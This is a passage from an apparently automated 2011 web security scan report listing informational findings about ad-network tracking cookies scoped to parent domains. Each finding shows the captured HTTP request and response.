Set-Cookie: rtc_UWJs=MLsvsLFOMQ5vJpHEvNGJwe3bNDdPqDE7tney9j8XHZxVnCKr9EgfSAe8w4hAY+1S3GROT8pMx0Dk4VfWE4HqpYJRGPSKlxLHFKzz4/0koCkSq5JBQoSmi7zZNoLT0dEAALAtP6fzvZAWXZ+loThQ0WihkO+/o6mSdVwKrgq9z/0E1nIO9J9fupr6fHiqjuefo+lRV1atV4Hbe4J0B6z/RoE1OlugGgSP3MMlt9IUJJODkKZG3Nw4/m9kHTtC0hHopLYwirAifOKc5uaHYXYNbKq2OBL8iIXHGM+Swv9IOQ5FriyvLu/Z2CaUGbzaZd2dky0d4PEM7QRN8YWclW7vMsiT9xDxB5BqTRyycw9kjP7n9k0mBN23/26VyDWsQXbFP9hc6xcdJ56gbc9aoDyd417qJh1f5VYyOgv3kiC8XFanPbQJ092ArYD50B0UuBaXIAGAg5g=; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:49:54 GMT; Path=/
Set-Cookie: udm_0=MLvv7iXuYS5npS5IdtJ9rYUnBG1JihVUWLZDwXDpfLby5LNpTzBgDsiqygfVxd+K709LxniKKr1/Jh0PZqrISRqeT7E3J/DikjgckzjZlb25WiMcZffZLOF2S/dP5ZcaSUyjrK5OU8eE/Wavz/TpePFNMR347DHYy3XTsgP5SOgfLi2GwOwvgwSwPLVp1lF3lYOUw6f71CvjHp+Rh4fhQCYkGhqAutVPhz+vTCxd0qyoBvHmxrcfZeCR+WPhx0hLfBQHIyR0lAybjT7WrbQdKQ1p21mwmYaKqD2ggWy/bPOUy7AIPoEwDd9Al3GUd/6WwYb6ifbYlDYxeMF8Gs4bgf44Lpr3AhvptLLNqAoF2xQFpyDXjMmuv9hPf2Ycb7kEPXmvqczS7iXwY+vPDiWLLcpHGbvlx38UVHa9EG7ByiyAurjCyLYLxlbjjX/DO1uknbOYlan89xrt3PsPSCciR/gs9XSoA+k3/mLyBOxjg1ZwmWwNhi5JUchRIQG3tn1ian+yYvzGpRivBsNAhhDeX+STD7boBawdVLIKsdraSo/2y0nY1qbU; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:49:54 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:49:53 GMT
Content-Length: 820

/* AG-develop 12.7.1-99 (2011-08-08 18:20:02 UTC) */
rsinetsegs=['J06575_10396','J06575_50240','J06575_50735','J06575_50778','J06575_50892'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
va
...[SNIP]...

11.36. http://pixel.mathtag.com/sync  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.mathtag.com
Path:   /sync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sync?mt_exid=2&admeld_user_id=14c82149-9fc3-4277-af4b-df6e89b3fc47&admeld_adprovider_id=296&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match&mm_bnc,%20http://tag.admeld.com/match?admeld_adprovider_id=296&external_user_id=4e62cac5-3093-5789-301b-6f4e7fbf3921 HTTP/1.1
Host: pixel.mathtag.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4e62cac5-3093-5789-301b-6f4e7fbf3921; ts=1315097285

Response

HTTP/1.1 302 Found
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x4 pid 0x7f38 32568
Cache-Control: no-cache
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Sun, 04 Sep 2011 00:56:32 GMT
Location: http://tag.admeld.com/match?admeld_adprovider_id=296&external_user_id=4e62cac5-3093-5789-301b-6f4e7fbf3921
Connection: Keep-Alive
Set-Cookie: ts=1315097792; domain=.mathtag.com; path=/; expires=Mon, 03-Sep-2012 00:56:32 GMT
Content-Length: 0


11.37. http://r.casalemedia.com/rum  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.casalemedia.com
Path:   /rum

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /rum?cm_dsp_id=4&external_user_id=2925993182975414771 HTTP/1.1
Host: r.casalemedia.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMS=102679&1315097055; CMSC=TmLJ3w**; CMDD=AAF1owE*; CMD1=AAFehU5iyd8AAZEXAAOXuwEBAA**; CMID=qPptfUPS1JUAAD6emfQAAAAa; CMPS=179; CMPP=016; CMST=TmLJ305iysIC; CMIMP=102679&1315097282

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: image/gif
Expires: Sun, 04 Sep 2011 00:56:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:56:38 GMT
Content-Length: 43
Connection: close
Set-Cookie: CMID=e9e8c1d58f5f3be19a1c66cf;domain=casalemedia.com;path=/;expires=Mon, 03 Sep 2012 00:56:38 GMT
Set-Cookie: CMPS=054;domain=casalemedia.com;path=/;expires=Sat, 03 Dec 2011 00:56:38 GMT
Set-Cookie: CMPP=002;domain=casalemedia.com;path=/;expires=Sat, 03 Dec 2011 00:56:38 GMT
Set-Cookie: CMRUM2=04000000002925993182975414771;domain=casalemedia.com;path=/;expires=Mon, 03 Sep 2012 00:56:38 GMT
Set-Cookie: CMST=TmLJ305izMYG;domain=casalemedia.com;path=/;expires=Mon, 05 Sep 2011 00:56:38 GMT

GIF89a.............!.......,...........D..;

11.38. http://r.openx.net/set  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.openx.net
Path:   /set

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set?pid=21a19823-5de3-4917-bc81-a4edea5127ff&rtb=2925993182975414771 HTTP/1.1
Host: r.openx.net
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i=d2a43928-76cd-49ea-b899-b41fb371435f

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:56:48 GMT
Server: Apache
Cache-Control: public, max-age=30, proxy-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: i=d2a43928-76cd-49ea-b899-b41fb371435f; expires=Tue, 03-Sep-2013 00:56:48 GMT; path=/; domain=.openx.net
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

11.39. http://r.turn.com/r/bd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/bd

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/bd?ddc=1&pid=54&cver=1&uid=6422714091563403120 HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fc=QAkDFs1L1_VV9R_c6UsDYaPBUEhJYdpD5gsI8S9o6pfJxmeG753N3cyfpzvDjP2Ci5OCbJ1Rk2iW9gYGlcBUN3tfVMi68hHF6JKMDotDPXLi3Sy-PEwXW67DoFr3mtCG; uid=2925993182975414771; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18%7C21; rds=15221%7C15221%7C15221%7C15221%7C15221%7C15221%7C15221%7Cundefined%7C15221%7C15221%7C15221%7C15221%7C15221%7C15221%7Cundefined%7C15221%7Cundefined%7Cundefined%7C15221%7C15221%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15221%7C15221; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: uid=8071372312438671107; Domain=.turn.com; Expires=Fri, 02-Mar-2012 00:58:56 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 04 Sep 2011 00:58:55 GMT

GIF89a.............!.......,...........D..;

11.40. http://r.turn.com/r/beacon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/beacon

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/beacon?b2=ItQwH2bCmVTfAECOql6s6SBT_BPJF-JVRX_nTmRBhFpwzH1UaDhfAXHNoQU6yinlbmW-EFxMQzXn3d_bHBz1AQ&cid= HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.sprint.com/index_c.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rrs=undefined%7Cundefined%7Cundefined%7C4%7Cundefined%7C6; rds=undefined%7Cundefined%7Cundefined%7C15221%7Cundefined%7C15221; rv=1; uid=2925993182975414771

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2925993182975414771; Domain=.turn.com; Expires=Fri, 02-Mar-2012 00:47:35 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1166786&t=2
Content-Length: 0
Date: Sun, 04 Sep 2011 00:47:35 GMT


11.41. http://r.turn.com/r/cms/id/0/ddc/1/pid/43/uid/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/cms/id/0/ddc/1/pid/43/uid/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/cms/id/0/ddc/1/pid/43/uid/?xid=u02DzKG_.KFBo5S2yyqljPCE HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fc=QAkDFs1L1_VV9R_c6UsDYaPBUEhJYdpD5gsI8S9o6pfJxmeG753N3cyfpzvDjP2Ci5OCbJ1Rk2iW9gYGlcBUN3tfVMi68hHF6JKMDotDPXLi3Sy-PEwXW67DoFr3mtCG; uid=2925993182975414771; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18%7C21; rds=15221%7C15221%7C15221%7C15221%7C15221%7C15221%7C15221%7Cundefined%7C15221%7C15221%7C15221%7C15221%7C15221%7C15221%7Cundefined%7C15221%7Cundefined%7Cundefined%7C15221%7C15221%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15221%7C15221; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: uid=6981538011179690654; Domain=.turn.com; Expires=Fri, 02-Mar-2012 00:57:37 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 04 Sep 2011 00:57:36 GMT

GIF89a.............!.......,...........D..;

11.42. http://rma-api.gravity.com/v1/beacons/initialize  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rma-api.gravity.com
Path:   /v1/beacons/initialize

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /v1/beacons/initialize?u=undefined&sg=6e1ea1b081dc6743bbe3537728eca43d HTTP/1.1
Host: rma-api.gravity.com
Proxy-Connection: keep-alive
Referer: http://www.scribd.com/embeds/63688924/content?start_page=1&view_mode=list&access_key=key-2mw49i3od1t7hxagubzd
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vaguid=172d38ad2d9b9b5aa42030c637b39839

Response

HTTP/1.1 200 OK
Server: ""
P3P: CP="NOI DSP COR ADMa OUR NOR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 70
Date: Sun, 04 Sep 2011 01:01:00 GMT
Connection: close
Set-Cookie: vaguid=172d38ad2d9b9b5aa42030c637b39839; Domain=.gravity.com; Expires=Sat, 05-May-2063 02:02:00 GMT; Path=/

GravityInsights.cc('grvinsights', '172d38ad2d9b9b5aa42030c637b39839');

11.43. http://rt.legolas-media.com/lgrt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rt.legolas-media.com
Path:   /lgrt

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lgrt?ci=2&ei=9&ti=28&pbi=37 HTTP/1.1
Host: rt.legolas-media.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ui=5ea31fa9-d42d-458f-9bb4-1700d69738c0; lgpr=//8=; lgdv12=1; lgdv6=1; lgdv95=1; lgdv73=1; lgtix=BgABADMBSQABADMBHAABADMBDAABADMB/QABADABXwABADMB

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:52:19 GMT
Server: Apache
Expires: -1
Cache-Control: no-cache; no-store
Content-Type: application/javascript
Set-Cookie: lgtix=BgABADMBSQABADMBHAADADMBDAABADMB/QABADABXwABADMB; path=/; expires=Wed, 03 Sep 2014 00:52:19 GMT; domain=.legolas-media.com
P3P: policyref="http://www.legolas-media.com/w3c/p3p.xml",CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Length: 5
Connection: close

true;

11.44. http://sync.adap.tv/sync  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sync.adap.tv
Path:   /sync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sync?type=gif&key=turn&uid=2925993182975414771 HTTP/1.1
Host: sync.adap.tv
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: asptvw1="ap4148%2C1%2C2011-09-03%2F18-44-50"; audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]},\"2\":{\"f\":1317625200,\"e\":1317625200,\"s\":[],\"a\":[]},\"20\":{\"f\":1317625200,\"e\":1317625200,\"s\":[],\"a\":[]}}}"; rtbData0="key=turn:value=2925993182975414771:expiresAt=Sat+Sep+10+17%3A44%3A51+PDT+2011:32-Compatible=true,key=adnetik:value=f9bdca69-e609-4297-9145-48ea56a0756c:expiresAt=Wed+Nov+02+17%3A44%3A53+PDT+2011:32-Compatible=true"; adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+17%3A44%3A59"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Content-Type: image/gif
Connection: Keep-Alive
Set-Cookie: rtbData0="key=turn:value=2925993182975414771:expiresAt=Sat+Sep+10+17%3A57%3A27+PDT+2011:32-Compatible=true,key=adnetik:value=f9bdca69-e609-4297-9145-48ea56a0756c:expiresAt=Wed+Nov+02+17%3A44%3A53+PDT+2011:32-Compatible=true";Path=/;Domain=.adap.tv;Expires=Wed, 13-May-2043 02:44:07 GMT
Content-Length: 42

GIF89a.............!.......,...........D.;

11.45. http://sync.mathtag.com/sync  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sync.mathtag.com
Path:   /sync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sync?mt_exid=2&admeld_user_id=14c82149-9fc3-4277-af4b-df6e89b3fc47&admeld_adprovider_id=296&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: sync.mathtag.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x4 pid 0x7f3c 32572
Cache-Control: no-cache
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Sun, 04 Sep 2011 00:55:52 GMT
Location: http://tag.admeld.com/match?admeld_adprovider_id=296&external_user_id=4e62cac5-3093-5789-301b-6f4e7fbf3921
Connection: Keep-Alive
Set-Cookie: ts=1315097752; domain=.mathtag.com; path=/; expires=Mon, 03-Sep-2012 00:55:52 GMT
Content-Length: 0


11.46. http://syndication.mmismm.com/tntwo.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://syndication.mmismm.com
Path:   /tntwo.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tntwo.php?mm_pub=7333&u=http%3A%2F%2Fblogs.sacbee.com%2Fthe_state_worker%2F%23navlink%3Dnavdrop&r=http%3A%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html&t=300?tm=330352 HTTP/1.1
Host: syndication.mmismm.com
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_12_4&protocol=http%3A&network=sacbee%3Ablogs_sacbee
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:13:33 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR BUS COM NAV"
Set-Cookie: U=WyBPG2WuR0m9hGPSaL94eQ--; expires=Sat, 03-Sep-2016 07:13:33 GMT; path=/; domain=.mmismm.com
Content-Length: 43
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/javascript

var msegs='';Mindset.handleResponse(msegs);

11.47. http://tacoda.at.atwola.com/rtx/r.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /rtx/r.js?cmd=LCN&si=11684&pi=-&xs=3&pu=http%253A//blogs.sacbee.com/the_state_worker/%2523navlink%253Dnavdrop%253Fifu%253Dhttp%25253A//www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html&df=1&v=6.0&cb=78634 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTc2NWlmdTFha2tjNzk=; ANRTT=; Tsid=0^1315097086^1315098886|17778^1315097086^1315098886; TData=99999|^; N=2:b2269f69029173967deb3f16e3a72f92; ATTAC=a3ZzZWc9OTk5OTk6; eadx=x

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:05:45 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Sun, 04 Sep 2011 01:20:45 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTc2NWlmdTFha2tjNzk=; path=/; expires=Wed, 29-Aug-12 01:05:45 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=; path=/; expires=Sun, 11-Sep-11 01:05:45 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1315097086^1315100145|17778^1315097086^1315098886|11684^1315097306^1315100145; path=/; expires=Sun, 04-Sep-11 01:35:45 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^; expires=Wed, 29-Aug-12 01:05:45 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:b2269f69029173967deb3f16e3a72f92,b2269f69029173967deb3f16e3a72f92; expires=Wed, 29-Aug-12 01:05:45 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6; expires=Wed, 29-Aug-12 01:05:45 GMT; path=/; domain=.at.atwola.com
ntCoent-Length: 102
Content-Type: application/x-javascript
Content-Length: 102

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='1765ifu1akkc79';
var ANSL='99999|^';
ANRTXR();


11.48. http://tags.bluekai.com/site/4195  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/4195

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/4195?id=b6f4436ac614b0358d75&?tm=915580 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_12_4&protocol=http%3A&network=sacbee%3Ablogs_sacbee
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=3yG99saNUAf9465B; bkou=KJye999999W=; bkst=KJhMRjMYpzYQym9UAJTqPa3RqJCr7Zd3ZKL4RmGHajZUkN/RbZBoks4G5F2AACX9O76Byy==; bk=myAUzYJX+9Fze1lp; bkc=KJhnasHQmYdOh1O6vLZwARsO/Hc/UX3J0G2CRRepol9p1nOh1enzwT7QbhG0GwOObZaXBuYt3tPQt9wA16c8RP0Gda96wAQdMcX/S1CbvxSsY3C8/wTbBe8/wRyFOUEFUMTZOoFpzxQIn0o4xGTOCxdueIBdTtaQrY7ehOY6OLWdT1i/y+I1hrXlxKV4PAckmlR0GwOO2LcT7YYdEt5QuYoaX9XtGdn5ske8/OgsUylAq2b10g5rHKVefWrWXQs3akys; bko=KJpgaVaQRe3P814/zWTRhonkRt9/VCw7hX/QYVDh1x99gXz/vx==; bkw5=KJypLs/9QAX1JT9A1TMJy1MyMS44CJcO0hRCyTQi/tucAsaYAUspOfWdxzVxjz05zzkAOpWymeaXRhOxOT7Bi9u8Q81no/SE0b6OHO8LjZOGYXvkF0xW3adMsT1mDJiPTD/G5F69ctTQdQ==; bkdc=sf; bklc=4e62ca02

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:13:12 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: bklc=4e62d0a8; expires=Tue, 06-Sep-2011 01:13:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bk=R+zBw0JX+9Fze1lp; expires=Fri, 02-Mar-2012 01:13:12 GMT; path=/; domain=.bluekai.com
